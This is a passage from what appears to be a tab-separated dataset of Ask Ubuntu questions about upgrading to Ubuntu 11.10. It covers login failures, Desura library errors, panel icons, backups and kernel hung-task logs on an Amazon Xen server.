//us.archive.ubuntu.com oneiric/main amd64 packages ign http : //archive.canonical.com oneiric/partner translation-en ign http : //security.ubuntu.com oneiric-security/main translation-en_us ign http : //security.ubuntu.com oneiric-security/main translation-en hit http : //us.archive.ubuntu.com oneiric/restricted amd64 packages hit http : //us.archive.ubuntu.com oneiric/universe amd64 packages hit http : //us.archive.ubuntu.com oneiric/multiverse amd64 packages hit http : //us.archive.ubuntu.com oneiric/main i386 packages hit http : //us.archive.ubuntu.com oneiric/restricted i386 packages hit http : //us.archive.ubuntu.com oneiric/universe i386 packages ign http : //security.ubuntu.com oneiric-security/multiverse translation-en_us ign http : //security.ubuntu.com oneiric-security/multiverse translation-en ign http : //security.ubuntu.com oneiric-security/restricted translation-en_us ign http : //security.ubuntu.com oneiric-security/restricted translation-en ign http : //security.ubuntu.com oneiric-security/universe translation-en_us ign http : //security.ubuntu.com oneiric-security/universe translation-en hit http : //us.archive.ubuntu.com oneiric/multiverse i386 packages hit http : //us.archive.ubuntu.com oneiric/main translationindex hit http : //us.archive.ubuntu.com oneiric/multiverse translationindex hit http : //us.archive.ubuntu.com oneiric/restricted translationindex hit http : //us.archive.ubuntu.com oneiric/universe translationindex hit http : //us.archive.ubuntu.com oneiric-updates/main sources hit http : //us.archive.ubuntu.com oneiric-updates/restricted sources hit http : //us.archive.ubuntu.com oneiric-updates/universe sources hit http : //us.archive.ubuntu.com oneiric-updates/multiverse sources hit http : //us.archive.ubuntu.com oneiric-updates/main amd64 packages hit http : //us.archive.ubuntu.com oneiric-updates/restricted amd64 packages hit http : //us.archive.ubuntu.com oneiric-updates/universe amd64 packages hit http : //us.archive.ubuntu.com oneiric-updates/multiverse amd64 packages hit http : //us.archive.ubuntu.com oneiric-updates/main i386 packages hit http : //us.archive.ubuntu.com oneiric-updates/restricted i386 packages hit http : //us.archive.ubuntu.com oneiric-updates/universe i386 packages hit http : //us.archive.ubuntu.com oneiric-updates/multiverse i386 packages hit http : //us.archive.ubuntu.com oneiric-updates/main translationindex hit http : //us.archive.ubuntu.com oneiric-updates/multiverse translationindex hit http : //us.archive.ubuntu.com oneiric-updates/restricted translationindex hit http : //us.archive.ubuntu.com oneiric-updates/universe translationindex hit http : //us.archive.ubuntu.com oneiric/main translation-en hit http : //us.archive.ubuntu.com oneiric/multiverse translation-en hit http : //us.archive.ubuntu.com oneiric/restricted translation-en hit http : //us.archive.ubuntu.com oneiric/universe translation-en hit http : //us.archive.ubuntu.com oneiric-updates/main translation-en hit http : //us.archive.ubuntu.com oneiric-updates/multiverse translation-en hit http : //us.archive.ubuntu.com oneiric-updates/restricted translation-en hit http : //us.archive.ubuntu.com oneiric-updates/universe translation-en reading package lists ... done reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . mdk @ savina : ~ $
65848	desura fails to run : error loading library libcef_desura.so	i 've been using desura for a few weeks now on 11.04 without any problems , however when i upgraded to 11.10 today and reinstalled desura i get this error message : include/sharedobjectloader.h:75 - error loading library libcef_desura.so : 'libplc4.so.0d : wrong elf class : elfclass32' i 'm running 64-bit 11.10 ubuntu desktop . i had a few errors before this one but i managed to fix them . desura actually runs however i can not see or click on anything on the pages .
65852	can not login to my user account	i upgraded my ubuntu from 11.04 to 11.10 via mounting the latest alternate cd image released on oct. 13 as the final standard version and running the cdromupgrade prompt successfully , with full latest upgrades installed before ending the distribution upgrading process and rebooting . after reboot , the new lightdm showed up as expected , and i could choose the login shell from a menu containing `` ubuntu '' , `` ubuntu 2d '' , `` recovery console '' , `` kde workspace '' , `` cairo-dock with effects '' , `` cairo-dock without effects '' , etc . next to my name which corresponds to my username . however , for example , i chose `` ubuntu '' ( as the default selection ) and input the correct ( if not correct , the lightdm would ask you to input again , but it did not do so , i have tried ) password and entered . the screen splashed to the black screen of the background text interface of gdm for a very short interval and then returned back to the interface of lightdm without my user account logged in and appeared as if i have not done anything on the laptop . neither could i log in as a guest user as the same black screen splashed and lightdm reappeared . before the upgrade , i could run gnome 2 , kde , unity all quite well on the laptop , but the status quo is that no one from the menu prompt beside my name can log in to my account , including the `` recovery console '' . actually i can switch to the ttys and log in my account with my username and passcode normally , as can run all commands in the tty ( i am currently doing this ) . i can also act like a superuser via the `` sudo '' command and get a # prompt via the `` sudo -i '' command , with the correct password , no problem . in the root prompt , i can run `` service lightdm stop '' and `` startx '' to a root unity ui successfully ( that is the way how this passage comes out ) , but in the $ prompt , after running `` service lightdm stop '' and `` startx '' , it simply appears `` no protocol specified '' endlessly and no gui appears . i found the package `` gnome-shell '' not fully installed and fixed it , but it did not help , simply resulting in a selection in the menu which can not access my account as its companions . i have made all the packages in my laptop up-to-date and no updates should be installed . my device is thinkpad x61 , with all its functions running well on all previous ubuntu distributions since 10.04 lts . i had upgraded my os from 10.04 lts to 10.10 in the way i performed today without any unexpected results one year ago . i suspect it is the newly integrated lightdm that set these obstacles , and i want to get this bug fixed , please help !
65854	is the source code of the online tour available ?	for oneiric ocelot launch , there was an awesome tour created for showcasing how ubuntu especially unity works . the ubuntu online tour actually mimics a whole desktop and to a greater extent behaves a lot like using unity in real . my question is where is the source code for this located ? i know i can do view source , but scraping information and trying to join them is not a feasible solution . if the whole code is present somewhere , it would be highly beneficial for the javascript community
65856	how does one exit the x server ?	the command sudo service gdm stop would successfully disable the x server in ubuntu 11.04 temporarily . however , this same command no longer works in ubuntu 11.10 , because `` gdm '' is an `` unrecognized service '' according to terminal . how , then , do i disable the x server in ubuntu 11.10 ?
65858	how to remove the mail icon indicator applet ?	i 'm wondering how it 's possible to remove the little mail indicator applet in the global menu . i 've uninstalled all the programs that use it , like thunderbird , empathy , and gwibber , since i do n't use any of them , but the icon is still there . any ideas ?
65861	how to i change from ubuntu to xubuntu ?	i 've read this q & a and i 'm ready to try it with xubuntu . that is , i 'll go from ubuntu to xubuntu . at this moment , my laptop is slow , even after the various optimizations . my question is whether this is the correct way to proceed . sudo apt-get upgrade # upgrade all existing packages to newest version sudo do-release-upgrade # upgrade system ( takes some hours ) sudo apt-get xubuntu-desktop # switch to gnome on login remove the ubuntu-desktop package ( which command should i use ? )
65864	how to backup a single file with deja-dup ?	when i reinstall i prefer to have a new system ; however there are some configuration files in ~/ might like to keep . can i back up a single file with deja dup ? ( note these files may need to stay in ~/ to work )
65866	how to hide the bluetooth icon in the panel ?	there was an option under bluetooth preferences in 11.04 to easily hide the icon , but in 11.10 , there 's a little bar near the top right corner called visibility . i 'm assuming that 's what hides or shows the bluetooth icon , but i ca n't move it . everything is locked in my bluetooth preferences , and i see no unlock button . any ideas ?
65872	switching from dropbox to ubuntu one ?	i have a free dropbox account which i use about 5-10 % of currently . i mostly use it on my windows 7 work laptop to store my source code backups ( pseudo-svn ) , and also on my windows 7 home desktop which i use to store some of my documents which i want to keep safe in case of data loss etc . i 'm just about to upgrade my netbook from 11.04 to 11.10 ( clean install ) . should i be switching from dropbox to ubuntu one ? it would n't be very difficult to transfer my files across , it 's mostly a case of which one is better for me . i 'd like to have my source code and documents available on my netbook and have been using the ubuntu dropbox client up until now and have been happy with it , but i know ubuntu one is more tightly intergrated with the os . which one do you suggest ?
65873	how do i move the clock in gnome classic ?	the clock in the middle is driving me batty and i ca n't get it to move to the right side of the screen where i would like it . no other log in works for me except gnome classic so i 'm sticking with that -- unfortunately , that means that none of the gnome 3 extensions i 've installed fix this issue . there 's no option to unlock or move if i right click it : ( how can i move this thing ? ?
65875	how would i go about installing gnome 2.x ?	i am trying to weigh out the pros and cons of upgrading to ubuntu 11.10 from 11.04 . i am currently using gnome for my desktop environment . how would i go about installing gnome 2.x to ubuntu 11.10 ? i have n't upgraded yet , i am just trying to gather information about the upgrading and issues i may run into before i upgrade . thanks !
65878	flash replacement for linux	i am using adobe flash browser plugin 11.0 in linux however playing a simple youtube clip causes the cpu to spike considerably on the npviewer.bin process with firefox , the same is true for chrome on linux . was anyone able to configure vlc , mplayer or similar to auto start when flv files are streamed from a website ? considering that vlc can stream flvs just fine .
65881	why do tasks on amazon xen instance block for over 120 seconds causing server to hang ?	i have an ubuntu server 11.04 natty in development with a jetty based webserver running on it . today i had an outage where i could n't access ssh or the webserver for an unknown period of time , but somewhere in the many minutes ( 5-60 ? ? ) range . i see the following in the syslogs and have found other discussion talking about system hangs related to this error . i wonder if anyone can make heads or tails of this . these are the cloud.ubuntu.com/ami images for aws . oct 13 22:03:43 localhost kernel : [ 185521.096127 ] info : task jbd2/xvda1-8:136 blocked for more than 120 seconds . oct 13 22:03:43 localhost kernel : [ 185521.096146 ] `` echo 0 > /proc/sys/kernel/hung_task_timeout_secs '' disables this message . oct 13 22:03:43 localhost kernel : [ 185521.096157 ] jbd2/xvda1-8 d eb35fe18 0 136 2 0x00000000 oct 13 22:03:43 localhost kernel : [ 185521.096162 ] eb35fe60 00000246 eb1b09b8 eb35fe18 c0135b80 44bcee4c eb3141ac c097f680 oct 13 22:03:43 localhost kernel : [ 185521.096168 ] 3b71d7cd 0000a892 eb3141a8 c097f680 c097f680 ec696680 eb313f20 e9a40000 oct 13 22:03:43 localhost kernel : [ 185521.096174 ] c08c6f80 0187099e eb35fe20 c01077d9 eb35fe28 eb1b09b8 eb35fe58 c0181af8 oct 13 22:03:43 localhost kernel : [ 185521.096180 ] call trace : < call trace cut > oct 13 22:03:43 localhost kernel : [ 185521.096272 ] info : task java:11610 blocked for more than 120 seconds . < same info from first message , cut for clarity > oct 13 22:03:43 localhost kernel : [ 185521.096430 ] info : task java:11614 blocked for more than 120 seconds . < same info from first message , cut for clarity > oct 13 22:03:43 localhost kernel : [ 185521.096586 ] info : task java:11632 blocked for more than 120 seconds . < same info from first message , cut for clarity > oct 13 22:03:43 localhost kernel : [ 185521.096745 ] info : task java:11633 blocked for more than 120 seconds . < same info from first message , cut for clarity > oct 13 22:05:43 localhost kernel : [ 185641.096048 ] info : task jbd2/xvda1-8:136 blocked for more than 120 seconds . < same info from first message , cut for clarity > oct 13 22:05:43 localhost kernel : [ 185641.096194 ] info : task java:11610 blocked for more than 120 seconds . < same info from first message , cut for clarity > oct 13 22:05:43 localhost kernel : [ 185641.096353 ] info : task java:11614 blocked for more than 120 seconds . < same info from first message , cut for clarity > oct 13 22:05:43 localhost kernel : [ 185641.096512 ] info : task java:11632 blocked for more than 120 seconds . < same info from first message , cut for clarity > oct 13 22:05:43 localhost kernel : [ 185641.096673 ] info : task java:11633 blocked for more than 120 seconds . < same info from first message , cut for clarity > the full log with stack traces is here : oct 13 22:03:43 localhost kernel : [ 185521.096127 ] info : task jbd2/xvda1-8:136 blocked for more than 120 seconds . oct 13 22:03:43 localhost kernel : [ 185521.096146 ] `` echo 0 > /proc/sys/kernel/hung_task_timeout_secs '' disables this message . oct 13 22:03:43 localhost kernel : [ 185521.096157 ] jbd2/xvda1-8 d eb35fe18 0 136 2 0x00000000 oct 13 22:03:43 localhost kernel : [ 185521.096162 ] eb35fe60 00000246 eb1b09b8 eb35fe18 c0135b80 44bcee4c eb3141ac c097f680 oct 13 22:03:43 localhost kernel : [ 185521.096168 ] 3b71d7cd 0000a892 eb3141a8 c097f680 c097f680 ec696680 eb313f20 e9a40000 oct 13 22:03:43 localhost kernel : [ 185521.096174 ] c08c6f80 0187099e eb35fe20 c01077d9 eb35fe28 eb1b09b8 eb35fe58 c0181af8 oct 13 22:03:43 localhost kernel : [ 185521.096180 ] call trace : oct 13 22:03:43 localhost kernel : [ 185521.096190 ] [ < c0135b80 > ] ? pvclock_clocksource_read+0xa0/0x110 oct 13 22:03:43 localhost kernel : [ 185521.096195 ] [ < c01077d9 > ] ? xen_clocksource_read+0x19/0x20 oct 13 22:03:43 localhost kernel : [ 185521.096200 ] [ < c0181af8 > ] ? ktime_get_ts+0xf8/0x120 oct 13 22:03:43 localhost kernel : [ 185521.096206 ] [ < c06355af > ] io_schedule+0x5f/0xa0 oct 13 22:03:43 localhost kernel : [ 185521.096211 ] [ < c0259c58 > ] sync_buffer+0x38/0x40 oct 13 22:03:43 localhost kernel : [ 185521.096215 ] [ < c0635dad > ] __wait_on_bit+0x4d/0x70 oct 13 22:03:43 localhost kernel : [ 185521.096218 ] [ < c0259c20 > ] ? sync_buffer+0x0/0x40 oct 13 22:03:43 localhost kernel : [ 185521.096221 ] [ < c0259c20 > ] ? sync_buffer+0x0/0x40 oct 13 22:03:43 localhost kernel : [ 185521.096224 ] [ < c0635e31 > ] out_of_line_wait_on_bit+0x61/0x70 oct 13 22:03:43 localhost kernel : [ 185521.096229 ] [ < c0176e20 > ] ? wake_bit_function+0x0/0x60 oct 13 22:03:43 localhost kernel : [ 185521.096232 ] [ < c0259c1e > ] __wait_on_buffer+0x2e/0x30 oct 13 22:03:43 localhost kernel : [ 185521.096237 ] [ < c02f6d6b > ] jbd2_journal_commit_transaction+0x4cb/0xf30 oct 13 22:03:43 localhost kernel : [ 185521.096241 ] [ < c06373d9 > ] ? _raw_spin_unlock_irqrestore+0x19/0x20 oct 13 22:03:43 localhost kernel : [ 185521.096245 ] [ < c0167637 > ] ? try_to_del_timer_sync+0x67/0xb0 oct 13 22:03:43 localhost kernel : [ 185521.096249 ] [ < c02fb2fe > ] kjournald2+0x8e/0x1c0 oct 13 22:03:43 localhost kernel : [ 185521.096252 ] [ < c0176dd0 > ] ? autoremove_wake_function+0x0/0x50 oct 13 22:03:43 localhost kernel : [ 185521.096255 ] [ < c02fb270 > ] ? kjournald2+0x0/0x1c0 oct 13 22:03:43 localhost kernel : [ 185521.096258 ] [ < c0176864 > ] kthread+0x74/0x80 oct 13 22:03:43 localhost kernel : [ 185521.096261 ] [ < c01767f0 > ] ? kthread+0x0/0x80 oct 13 22:03:43 localhost kernel : [ 185521.096265 ] [ < c010b0fe > ] kernel_thread_helper+0x6/0x10 oct 13 22:03:43 localhost kernel : [ 185521.096272 ] info : task java:11610 blocked for more than 120 seconds . oct 13 22:03:43 localhost kernel : [ 185521.096282 ] `` echo 0 > /proc/sys/kernel/hung_task_timeout_secs '' disables this message . oct 13 22:03:43 localhost kernel : [ 185521.096291 ] java d c1157cd8 0 11610 1 0x00000000 oct 13 22:03:43 localhost kernel : [ 185521.096295 ] c1157ce0 00000286 c01542dd c1157cd8 c010775b c1157cc4 c101742c c097f680 oct 13 22:03:43 localhost kernel : [ 185521.096301 ] b3eb4995 0000a893 c1017428 c097f680 c097f680 ec696680 c10171a0 c086cf60 oct 13 22:03:43 localhost kernel : [ 185521.096307 ] c1157ccc c0135b80 ba41686c 017f78fc 52d5d139 03e5075e 00000200 c10171a0 oct 13 22:03:43 localhost kernel : [ 185521.096313 ] call trace : oct 13 22:03:43 localhost kernel : [ 185521.096317 ] [ < c01542dd > ] ? account_idle_ticks+0xd/0x10 oct 13 22:03:43 localhost kernel : [ 185521.096320 ] [ < c010775b > ] ? do_stolen_accounting+0x21b/0x250 oct 13 22:03:43 localhost kernel : [ 185521.096324 ] [ < c0135b80 > ] ? pvclock_clocksource_read+0xa0/0x110 oct 13 22:03:43 localhost kernel : [ 185521.096327 ] [ < c010721e > ] ? __raw_callee_save_xen_restore_fl+0x6/0x8 oct 13 22:03:43 localhost kernel : [ 185521.096330 ] [ < c06373d9 > ] ? _raw_spin_unlock_irqrestore+0x19/0x20 oct 13 22:03:43 localhost kernel : [ 185521.096334 ] [ < c0177038 > ] ? prepare_to_wait+0x48/0x70 oct 13 22:03:43 localhost kernel : [ 185521.096337 ] [ < c02f5ca5 > ] do_get_write_access+0x235/0x3f0 oct 13 22:03:43 localhost kernel : [ 185521.096340 ] [ < c025aa64 > ] ? __find_get_block+0xb4/0xe0 oct 13 22:03:43 localhost kernel : [ 185521.096344 ] [ < c0176e20 > ] ? wake_bit_function+0x0/0x60 oct 13 22:03:43 localhost kernel : [ 185521.096348 ] [ < c02f478d > ] ? start_this_handle.clone.5+0x39d/0x420 oct 13 22:03:43 localhost kernel : [ 185521.096352 ] [ < c01424a4 > ] ? update_cfs_load+0x204/0x290 oct 13 22:03:43 localhost kernel : [ 185521.096355 ] [ < c02f5f68 > ] jbd2_journal_get_write_access+0x28/0x40 oct 13 22:03:43 localhost kernel : [ 185521.096359 ] [ < c02de97f > ] __ext4_journal_get_write_access+0x2f/0x80 oct 13 22:03:43 localhost kernel : [ 185521.096365 ] [ < c02bbef7 > ] ext4_reserve_inode_write+0x67/0x80 oct 13 22:03:43 localhost kernel : [ 185521.096368 ] [ < c02bbf4c > ] ext4_mark_inode_dirty+0x3c/0x1c0 oct 13 22:03:43 localhost kernel : [ 185521.096374 ] [ < c02d3423 > ] ? ext4_journal_start_sb+0x93/0x110 oct 13 22:03:43 localhost kernel : [ 185521.096378 ] [ < c02c0b51 > ] ? ext4_dirty_inode+0x31/0x50 oct 13 22:03:43 localhost kernel : [ 185521.096381 ] [ < c02c0b51 > ] ext4_dirty_inode+0x31/0x50 oct 13 22:03:43 localhost kernel : [ 185521.096385 ] [ < c0253ed9 > ] __mark_inode_dirty+0x29/0x1d0 oct 13 22:03:43 localhost kernel : [ 185521.096388 ] [ < c025b4ec > ] ? __set_page_dirty+0x6c/0xc0 oct 13 22:03:43 localhost kernel : [ 185521.096392 ] [ < c0249741 > ] file_update_time+0xc1/0x140 oct 13 22:03:43 localhost kernel : [ 185521.096396 ] [ < c0208d1f > ] do_wp_page+0x12f/0x820 oct 13 22:03:43 localhost kernel : [ 185521.096399 ] [ < c017ad89 > ] ? hrtimer_cancel+0x19/0x30 oct 13 22:03:43 localhost kernel : [ 185521.096402 ] [ < c020b276 > ] handle_pte_fault+0x296/0x2f0 oct 13 22:03:43 localhost kernel : [ 185521.096406 ] [ < c0105a64 > ] ? pte_mfn_to_pfn+0xa4/0xc0 oct 13 22:03:43 localhost kernel : [ 185521.096409 ] [ < c020bf39 > ] handle_mm_fault+0x109/0x1b0 oct 13 22:03:43 localhost kernel : [ 185521.096413 ] [ < c063aad0 > ] ? do_page_fault+0x0/0x490 oct 13 22:03:43 localhost kernel : [ 185521.096416 ] [ < c063ac2e > ] do_page_fault+0x15e/0x490 oct 13 22:03:43 localhost kernel : [ 185521.096421 ] [ < c018b76e > ] ? sys_futex+0x6e/0x120 oct 13 22:03:43 localhost kernel : [ 185521.096424 ] [ < c063aad0 > ] ? do_page_fault+0x0/0x490 oct 13 22:03:43 localhost kernel : [ 185521.096427 ] [ < c0637e3f > ] error_code+0x67/0x6c oct 13 22:03:43 localhost kernel : [ 185521.096430 ] info : task java:11614 blocked for more than 120 seconds . oct 13 22:03:43 localhost kernel : [ 185521.096437 ] `` echo 0 > /proc/sys/kernel/hung_task_timeout_secs '' disables this message . oct 13 22:03:43 localhost kernel : [ 185521.096446 ] java d eb1b3c44 0 11614 1 0x00000000 oct 13 22:03:43 localhost kernel : [ 185521.096450 ] eb1b3c68 00000286 c010775b eb1b3c44 5f8f1640 0000a10a e9a4742c c097f680 oct 13 22:03:43 localhost kernel : [ 185521.096456 ] e74d77b9 0000a890 e9a47428 c097f680 c097f680 ec696680 e9a471a0 c086cf60 oct 13 22:03:43 localhost kernel : [ 185521.096462 ] c063732d eb1b3c3c c039391c ffffffe0 c02f478d eb089400 00000200 e9a471a0 oct 13 22:03:43 localhost kernel : [ 185521.096468 ] call trace : oct 13 22:03:43 localhost kernel : [ 185521.096471 ] [ < c010775b > ] ? do_stolen_accounting+0x21b/0x250 oct 13 22:03:43 localhost kernel : [ 185521.096474 ] [ < c063732d > ] ? _raw_spin_lock+0xd/0x10 oct 13 22:03:43 localhost kernel : [ 185521.096478 ] [ < c039391c > ] ? __percpu_counter_add+0x8c/0xb0 oct 13 22:03:43 localhost kernel : [ 185521.096481 ] [ < c02f478d > ] ? start_this_handle.clone.5+0x39d/0x420 oct 13 22:03:43 localhost kernel : [ 185521.096485 ] [ < c010721e > ] ? __raw_callee_save_xen_restore_fl+0x6/0x8 oct 13 22:03:43 localhost kernel : [ 185521.096488 ] [ < c06373d9 > ] ? _raw_spin_unlock_irqrestore+0x19/0x20 oct 13 22:03:43 localhost kernel : [ 185521.096491 ] [ < c0177038 > ] ? prepare_to_wait+0x48/0x70 oct 13 22:03:43 localhost kernel : [ 185521.096494 ] [ < c02f5ca5 > ] do_get_write_access+0x235/0x3f0 oct 13 22:03:43 localhost kernel : [ 185521.096498 ] [ < c025aa64 > ] ? __find_get_block+0xb4/0xe0 oct 13 22:03:43 localhost kernel : [ 185521.096501 ] [ < c0176e20 > ] ? wake_bit_function+0x0/0x60 oct 13 22:03:43 localhost kernel : [ 185521.096504 ] [ < c02f478d > ] ? start_this_handle.clone.5+0x39d/0x420 oct 13 22:03:43 localhost kernel : [ 185521.096508 ] [ < c01077d9 > ] ? xen_clocksource_read+0x19/0x20 oct 13 22:03:43 localhost kernel : [ 185521.096511 ] [ < c02f5f68 > ] jbd2_journal_get_write_access+0x28/0x40 oct 13 22:03:43 localhost kernel : [ 185521.096515 ] [ < c02de97f > ] __ext4_journal_get_write_access+0x2f/0x80 oct 13 22:03:43 localhost kernel : [ 185521.096518 ] [ < c02bbef7 > ] ext4_reserve_inode_write+0x67/0x80 oct 13 22:03:43 localhost kernel : [ 185521.096522 ] [ < c02bbf4c > ] ext4_mark_inode_dirty+0x3c/0x1c0 oct 13 22:03:43 localhost kernel : [ 185521.096525 ] [ < c02d3423 > ] ? ext4_journal_start_sb+0x93/0x110 oct 13 22:03:43 localhost kernel : [ 185521.096529 ] [ < c02c0b51 > ] ? ext4_dirty_inode+0x31/0x50 oct 13 22:03:43 localhost kernel : [ 185521.096532 ] [ < c02c0b51 > ] ext4_dirty_inode+0x31/0x50 oct 13 22:03:43 localhost kernel : [ 185521.096535 ] [ < c0253ed9 > ] __mark_inode_dirty+0x29/0x1d0 oct 13 22:03:43 localhost kernel : [ 185521.096539 ] [ < c03275d4 > ] ? security_inode_need_killpriv+0x14/0x20 oct 13 22:03:43 localhost kernel : [ 185521.096543 ] [ < c01eb644 > ] ? file_remove_suid+0x24/0x80 oct 13 22:03:43 localhost kernel : [ 185521.096546 ] [ < c0249741 > ] file_update_time+0xc1/0x140 oct 13 22:03:43 localhost kernel : [ 185521.096550 ] [ < c01ed478 > ] __generic_file_aio_write+0x1e8/0x4e0 oct 13 22:03:43 localhost kernel : [ 185521.096553 ] [ < c01ed7ce > ] generic_file_aio_write+0x5e/0xd0 oct 13 22:03:43 localhost kernel : [ 185521.096556 ] [ < c06373d9 > ] ? _raw_spin_unlock_irqrestore+0x19/0x20 oct 13 22:03:43 localhost kernel : [ 185521.096560 ] [ < c02b54b4 > ] ext4_file_write+0x54/0x2a0 oct 13 22:03:43 localhost kernel : [ 185521.096563 ] [ < c0189e42 > ] ? futex_wait+0x1c2/0x280 oct 13 22:03:43 localhost kernel : [ 185521.096567 ] [ < c02322f4 > ] do_sync_write+0xa4/0xe0 oct 13 22:03:43 localhost kernel : [ 185521.096570 ] [ < c023272c > ] ? rw_verify_area+0x6c/0x130 oct 13 22:03:43 localhost kernel : [ 185521.096574 ] [ < c0232ab2 > ] vfs_write+0xa2/0x170 oct 13 22:03:43 localhost kernel : [ 185521.096576 ] [ < c0232250 > ] ? do_sync_write+0x0/0xe0 oct 13 22:03:43 localhost kernel : [ 185521.096579 ] [ < c0232d92 > ] sys_write+0x42/0x70 oct 13 22:03:43 localhost kernel : [ 185521.096582 ] [ < c0637754 > ] syscall_call+0x7/0xb oct 13 22:03:43 localhost kernel : [ 185521.096586 ] info : task java:11632 blocked for more than 120 seconds . oct 13 22:03:43 localhost kernel : [ 185521.096593 ] `` echo 0 > /proc/sys/kernel/hung_task_timeout_secs '' disables this message . oct 13 22:03:43 localhost kernel : [ 185521.096601 ] java d e9921480 0 11632 1 0x00000000 oct 13 22:03:43 localhost kernel : [ 185521.096605 ] eb12bc68 00000286 c06373d9 e9921480 eb12bbfc c01770a1 e98b4e4c c097f680 oct 13 22:03:43 localhost kernel : [ 185521.096611 ] b4f8677b 0000a89b e98b4e48 c097f680 c097f680 ec696680 e98b4bc0 e9a43f20 oct 13 22:03:43 localhost kernel : [ 185521.096617 ] c0243d55 00000000 68de56ac 00000001 c0242c70 0000001c 00000200 e98b4bc0 oct 13 22:03:43 localhost kernel : [ 185521.096623 ] call trace : oct 13 22:03:43 localhost kernel : [ 185521.096626 ] [ < c06373d9 > ] ? _raw_spin_unlock_irqrestore+0x19/0x20 oct 13 22:03:43 localhost kernel : [ 185521.096629 ] [ < c01770a1 > ] ? remove_wait_queue+0x41/0x50 oct 13 22:03:43 localhost kernel : [ 185521.096633 ] [ < c0243d55 > ] ? do_sys_poll+0x145/0x1e0 oct 13 22:03:43 localhost kernel : [ 185521.096637 ] [ < c0242c70 > ] ? __pollwait+0x0/0xd0 oct 13 22:03:43 localhost kernel : [ 185521.096640 ] [ < c010721e > ] ? __raw_callee_save_xen_restore_fl+0x6/0x8 oct 13 22:03:43 localhost kernel : [ 185521.096643 ] [ < c06373d9 > ] ? _raw_spin_unlock_irqrestore+0x19/0x20 oct 13 22:03:43 localhost kernel : [ 185521.096646 ] [ < c0177038 > ] ? prepare_to_wait+0x48/0x70 oct 13 22:03:43 localhost kernel : [ 185521.096650 ] [ < c02f5ca5 > ] do_get_write_access+0x235/0x3f0 oct 13 22:03:43 localhost kernel : [ 185521.096653 ] [ < c025aa64 > ] ? __find_get_block+0xb4/0xe0 oct 13 22:03:43 localhost kernel : [ 185521.096656 ] [ < c0176e20 > ] ? wake_bit_function+0x0/0x60 oct 13 22:03:43 localhost kernel : [ 185521.096659 ] [ < c02f478d > ] ? start_this_handle.clone.5+0x39d/0x420 oct 13 22:03:43 localhost kernel : [ 185521.096663 ] [ < c02f5f68 > ] jbd2_journal_get_write_access+0x28/0x40 oct 13 22:03:43 localhost kernel : [ 185521.096666 ] [ < c02de97f > ] __ext4_journal_get_write_access+0x2f/0x80 oct 13 22:03:43 localhost kernel : [ 185521.096670 ] [ < c02bbef7 > ] ext4_reserve_inode_write+0x67/0x80 oct 13 22:03:43 localhost kernel : [ 185521.096673 ] [ < c02bbf4c > ] ext4_mark_inode_dirty+0x3c/0x1c0 oct 13 22:03:43 localhost kernel : [ 185521.096677 ] [ < c02d3423 > ] ? ext4_journal_start_sb+0x93/0x110 oct 13 22:03:43 localhost kernel : [ 185521.096680 ] [ < c02c0b51 > ] ? ext4_dirty_inode+0x31/0x50 oct 13 22:03:43 localhost kernel : [ 185521.096684 ] [ < c02c0b51 > ] ext4_dirty_inode+0x31/0x50 oct 13 22:03:43 localhost kernel : [ 185521.096687 ] [ < c0253ed9 > ] __mark_inode_dirty+0x29/0x1d0 oct 13 22:03:43 localhost kernel : [ 185521.096690 ] [ < c03275d4 > ] ? security_inode_need_killpriv+0x14/0x20 oct 13 22:03:43 localhost kernel : [ 185521.096693 ] [ < c01eb644 > ] ? file_remove_suid+0x24/0x80 oct 13 22:03:43 localhost kernel : [ 185521.096696 ] [ < c0249741 > ] file_update_time+0xc1/0x140 oct 13 22:03:43 localhost kernel : [ 185521.096699 ] [ < c01ed478 > ] __generic_file_aio_write+0x1e8/0x4e0 oct 13 22:03:43 localhost kernel : [ 185521.096702 ] [ < c0104bb0 > ] ? xen_mc_flush+0x90/0x1b0 oct 13 22:03:43 localhost kernel : [ 185521.096706 ] [ < c01ed7ce > ] generic_file_aio_write+0x5e/0xd0 oct 13 22:03:43 localhost kernel : [ 185521.096709 ] [ < c02b54b4 > ] ext4_file_write+0x54/0x2a0 oct 13 22:03:43 localhost kernel : [ 185521.096712 ] [ < c010721e > ] ? __raw_callee_save_xen_restore_fl+0x6/0x8 oct 13 22:03:43 localhost kernel : [ 185521.096716 ] [ < c0225ce8 > ] ? kmem_cache_free+0x68/0xd0 oct 13 22:03:43 localhost kernel : [ 185521.096719 ] [ < c0225ce8 > ] ? kmem_cache_free+0x68/0xd0 oct 13 22:03:43 localhost kernel : [ 185521.096722 ] [ < c024443f > ] ? __d_free+0x2f/0x50 oct 13 22:03:43 localhost kernel : [ 185521.096725 ] [ < c02322f4 > ] do_sync_write+0xa4/0xe0 oct 13 22:03:43 localhost kernel : [ 185521.096728 ] [ < c023272c > ] ? rw_verify_area+0x6c/0x130 oct 13 22:03:43 localhost kernel : [ 185521.096731 ] [ < c0232ab2 > ] vfs_write+0xa2/0x170 oct 13 22:03:43 localhost kernel : [ 185521.096736 ] [ < c0232250 > ] ? do_sync_write+0x0/0xe0 oct 13 22:03:43 localhost kernel : [ 185521.096739 ] [ < c0232d92 > ] sys_write+0x42/0x70 oct 13 22:03:43 localhost kernel : [ 185521.096742 ] [ < c0637754 > ] syscall_call+0x7/0xb oct 13 22:03:43 localhost kernel : [ 185521.096745 ] info : task java:11633 blocked for more than 120 seconds . oct 13 22:03:43 localhost kernel : [ 185521.096752 ] `` echo 0 > /proc/sys/kernel/hung_task_timeout_secs '' disables this message . oct 13 22:03:43 localhost kernel : [ 185521.096761 ] java d 00200200 0 11633 1 0x00000000 oct 13 22:03:43 localhost kernel : [ 185521.096765 ] c10bfce0 00000286 00100100 00200200 e9921140 c117ad90 eb85a86c c097f680 oct 13 22:03:43 localhost kernel : [ 185521.096771 ] 3fa48480 0000a89e eb85a868 c097f680 c097f680 ec696680 eb85a5e0 c086cf60 oct 13 22:03:43 localhost kernel : [ 185521.096777 ] 80000001 5501a067 eb078200 b77b2000 00000000 00000000 00000200 eb85a5e0 oct 13 22:03:43 localhost kernel : [ 185521.096783 ] call trace : oct 13 22:03:43 localhost kernel : [ 185521.096786 ] [ < c010721e > ] ? __raw_callee_save_xen_restore_fl+0x6/0x8 oct 13 22:03:43 localhost kernel : [ 185521.096790 ] [ < c06373d9 > ] ? _raw_spin_unlock_irqrestore+0x19/0x20 oct 13 22:03:43 localhost kernel : [ 185521.096793 ] [ < c0177038 > ] ? prepare_to_wait+0x48/0x70 oct 13 22:03:43 localhost kernel : [ 185521.096796 ] 